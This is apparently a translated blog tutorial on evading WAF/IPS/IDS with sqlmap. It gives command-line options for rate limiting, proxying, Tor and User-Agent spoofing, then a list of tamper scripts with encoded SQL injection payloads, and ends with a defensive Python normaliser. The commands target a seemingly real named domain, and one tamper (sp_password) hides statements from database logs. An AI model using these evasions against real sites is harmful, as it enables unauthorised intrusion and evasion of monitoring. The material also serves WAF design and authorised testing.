0x00 Preface
Many web sites now sit behind a WAF/IPS/IDS. When such a site is tested for SQL injection, requests get blocked and the source IP is frequently banned, so an ordinary scan gets nowhere. This post summarises how sqlmap can be used when a WAF/IPS/IDS is in the way: sqlmap ships with a number of built-in evasion options, and the material below is split into 2 parts, the general command-line options and the tamper scripts.
0x01 Identifying the WAF
First determine whether the web site sits behind a WAF/IPS/IDS at all, since that decides how the rest of the test is run. The usual tools for identifying a WAF are nmap's NSE scripts, WVS and AppScan; when those cannot tell, sqlmap itself can detect a WAF/IPS/IDS:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --identify-waf  # identify which WAF/IPS/IDS product is in front of the target
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --check-waf  # only check whether a WAF/IPS/IDS is present
Note: recent sqlmap releases run this detection automatically on first contact and no longer accept --identify-waf or --check-waf; --skip-waf turns the automatic check off.
0x02 Bypassing with command-line options
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2  # use a random User-Agent; many WAFs block sqlmap's default User-Agent outright
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3  # HTTP parameter pollution; works best against ASP.NET/IIS back ends
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60  # pause 3.5 s between requests and allow 60 s for time-based responses, to stay under the WAF's rate limit and avoid timeouts
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=http://211.211.211.211:8080 --proxy-cred=211:985  # route the traffic through an (authenticated) proxy; --proxy needs the scheme prefix
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy  # ignore the system proxy settings, e.g. when scanning an internal network
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session  # discard the saved session for this target and start over
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex  # retrieve data hex-encoded; --no-cast similarly turns off payload casting
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile  # imitate a smartphone through the HTTP User-Agent header
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor  # use the Tor anonymity network
0x03 Bypassing with tamper scripts
1 Usage
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py  # scripts are applied in the given order: A first, then B
2 Script list
01 apostrophemask.py: replaces the apostrophe (') with its UTF-8 full-width counterpart. Requirement: all. Example: ("1 AND '1'='1") -> '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
02 equaltolike.py: replaces every '=' operator with LIKE. Tested on MSSQL and SQLite. Example: Input: SELECT * FROM users WHERE id=1, Output: SELECT * FROM users WHERE id LIKE 1
03 greatest.py: replaces the '>' operator with a GREATEST() expression. Tested on MySQL. Example: ('1 AND A > B') -> '1 AND GREATEST(A,B+1)=A'
04 space2hash.py: replaces each space with '#' followed by a random string and a newline. Requirement: MySQL. Example: Input: 1 AND 9227=9227, Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
05 apostrophenullencode.py: replaces the apostrophe with its illegal double-unicode counterpart (%00%27). Tested on MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL.
06 halfversionedmorekeywords.py: prefixes each keyword with a MySQL versioned-comment opener (/*!0). Requirement: MySQL < 5.1.
07 space2morehash.py: like space2hash.py, replaces spaces with '#', a random string and a newline. Requirement: MySQL >= 5.1.13.
08 appendnullbyte.py: appends a NULL byte (%00) to the end of the payload. Requirement: Microsoft Access. Example: ('1 AND 1=1') -> '1 AND 1=1%00'
09 ifnull2ifisnull.py: replaces 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'. Tested on MySQL, SQLite (possibly), SAP MaxDB.
10 space2mssqlblank.py: replaces each space with a random blank character from the set MSSQL accepts. Requirement: Microsoft SQL Server.
11 base64encode.py: base64-encodes the whole payload. Requirement: all. Example: ("1' AND SLEEP(5)#") -> 'MScgQU5EIFNMRUVQKDUpIw=='
12 space2mssqlhash.py: replaces each space with '#' followed by a newline. Requirement: MSSQL (also works on MySQL).
13 modsecurityversioned.py: wraps the whole query in a MySQL versioned comment. Requirement: MySQL. Example: ('1 AND 2>1--') -> '1 /*!30874AND 2>1*/--'
14 space2mysqlblank.py: replaces each space with a random blank character from the set MySQL accepts. Requirement: MySQL.
15 between.py: replaces '>' with 'NOT BETWEEN 0 AND #' and '=' with 'BETWEEN # AND #'. Tested on MS SQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0.
16 space2mysqldash.py: replaces each space with a dash comment ('--') followed by a newline ('\n'). Requirement: MySQL, MSSQL.
17 multiplespaces.py: adds multiple spaces around SQL keywords. Example: ('1 UNION SELECT foobar') -> '1    UNION     SELECT   foobar'
18 space2plus.py: replaces each space with '+'. Example: ('SELECT id FROM users') -> 'SELECT+id+FROM+users'
19 bluecoat.py: replaces the space after a SQL keyword with a valid random blank character, then replaces '=' with LIKE. Tested on MySQL 5.1 behind Blue Coat SGOS.
20 nonrecursivereplacement.py: rewrites predefined SQL keywords into forms that survive a non-recursive filter such as .replace("SELECT", "").
21 space2randomblank.py: replaces each space with a random blank character from a valid set. Requirement: all.
22 sp_password.py: appends 'sp_password' to the end of the payload so that MSSQL omits the statement from its logs. Requirement: MSSQL.
23 chardoubleencode.py: double URL-encodes every character of the payload (already-encoded characters are left alone).
24 unionalltounion.py: replaces UNION ALL SELECT with UNION SELECT. Example: ('-1 UNION ALL SELECT') -> '-1 UNION SELECT'
25 charencode.py: URL-encodes every character of the payload (already-encoded characters are left alone). Tested on Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0.
26 randomcase.py: randomises the case of each keyword character. Tested on Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0.
27 unmagicquotes.py: replaces the quote with the multi-byte combination %bf%27 and appends a generic comment, for targets using magic_quotes_gpc / addslashes. Example: Input: 1' AND 1=1, Output: 1%bf%27 AND 1=1--%20
28 randomcomments.py: inserts /**/ comments inside SQL keywords. Example: 'INSERT' becomes 'IN/**/S/**/ERT'
29 charunicodeencode.py: unicode-URL-encodes (%uXXXX) the characters of the payload that are not already encoded. Requirement: ASP, ASP.NET.
30 securesphere.py: appends a specially crafted string. Example: ('1 AND 1=1') -> "1 AND 1=1 and '0having'='0having'"
31 versionedmorekeywords.py: encloses each keyword in a MySQL versioned comment. Requirement: MySQL >= 5.1.13.
32 space2comment.py: replaces each space (' ') with a '/**/' comment.
33 halfversionedmorekeywords.py: the same script as 06 above; prefixes each keyword with a MySQL versioned-comment opener. Requirement: MySQL < 5.1.
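As an added example that is not part of the original post, here is the defender's side of the list above: why these scripts get past a filter that matches literal strings, and the normalisation a WAF has to apply before matching. The signatures, normalisation rules and sample payloads are constructed for this illustration; a production WAF (ModSecurity's transformation chain, for instance) applies a far larger rule set.

```python
import re
from urllib.parse import unquote

# Literal signatures a naive filter would match against the raw request (constructed).
SIGNATURES = ("UNION SELECT", "AND 1=1", "INSERT")

def decode(payload):
    """Peel off the encoding layers the tamper scripts above add."""
    s = payload
    for _ in range(3):                    # chardoubleencode needs more than one pass
        d = unquote(s, errors="ignore")   # charencode; the stray %bf of unmagicquotes is dropped
        if d == s:
            break
        s = d
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m[1], 16)), s)  # charunicodeencode
    return s.replace("\uff07", "'").replace("\x00", "")  # apostrophemask, null-byte scripts

def normalise(payload):
    """Canonical readings of a tampered payload. /**/ is ambiguous (space2comment
    uses it as a separator, randomcomments puts it inside keywords), so both
    readings are returned and a signature may match either."""
    s = decode(payload)
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # versioned comments (13, 31)
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)                   # space2hash / space2mysqldash
    forms = []
    for repl in (" ", ""):
        t = re.sub(r"/\*.*?\*/", repl, s, flags=re.S)
        t = re.sub(r"[\s+\x01-\x1f]+", " ", t)                # blanks, '+', control-char blanks
        forms.append(t.strip().upper())                       # randomcase
    return forms

def is_blocked(payload, naive):
    """naive=True matches the raw text; naive=False matches the canonical forms."""
    forms = [payload] if naive else normalise(payload)
    return any(sig in f for f in forms for sig in SIGNATURES)

# Constructed samples shaped like the tamper outputs listed on this page.
SAMPLES = [
    "1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A1=1",  # space2hash
    "1/*!UnIoN*//*!SeLeCt*/2",                 # versionedmorekeywords + randomcase
    "1%bf%27+aNd+1=1--%20",                    # unmagicquotes + space2plus + randomcase
    "IN/**/S/**/ERT",                          # randomcomments
    "%2555NION%2520SELECT",                    # chardoubleencode (partial)
]

if __name__ == "__main__":
    for p in SAMPLES:
        print(f"{p!r:42} naive={is_blocked(p, True)!s:6} normalised={is_blocked(p, False)}")
```

Every sample slips past the literal check and is caught after normalisation; base64encode output is deliberately not handled, since it can only be decoded with knowledge of the content type, and each extra decoding step is also one more place where the WAF and the back end can parse the same bytes differently.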